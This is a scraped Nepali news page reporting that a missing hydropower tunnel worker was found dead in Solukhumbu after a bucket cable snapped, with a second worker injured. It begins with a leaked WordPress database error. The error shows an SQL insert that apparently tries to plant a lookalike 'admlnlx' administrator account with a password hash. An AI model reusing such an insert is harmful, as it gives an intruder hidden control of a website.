WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWHVEnwtLBx5zZ.WzXS/BM7ESLpeAf1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 08:38:33', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखोलामा निर्माधिन दूधकोसी जलविद्युत् आयोजनाको सुरुङमा वेपत्ता कामदारको शव तीन दिनपछि भेटिएको छ । निर्माणधीन ८६ मेगावाटको उक्त हाइड्रोपावरको सुरुङमा गत बिहीवार देखि वेपत्ता बाराको कोलभी नगरपालिका १ का २४ वर्षीय राकेश चौधरीको शव शनिबार दिउँसो भेटिएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ ।
नेपाल प्रहरी, नेपाली सेना र हाड्रोपावरका कर्मचारीहरुको तीन दिन देखिको सकृयतापछि शनिबार दिउँसो करिब १६० मिटर तल शव भेटिएको हो । शवको उद्धार पश्चात कानुनी प्रकृया पुरा गरि पोष्टमार्टमका लागि जिल्ला अस्पताल फाप्लु पठाएको छ ।
विहिबार विहान अन्दाजी ५ बजे सुरुङ मार्गमा जाने क्रममा बकेट चुँडिदा हाड्रोपावरका कामदार चौधरी बेपत्ता भएका थिए भने अर्का कामदार पर्साको पटेरवा गाउँपालिका ४ का २० वर्षीय अंगत राय थारु घाईते भएका थिए । घाईतेको काठमाण्डौमा रहेको ग्रान्डी अस्पतालमा उपचार भइरहेको आयोजनाले जनाएको छ ।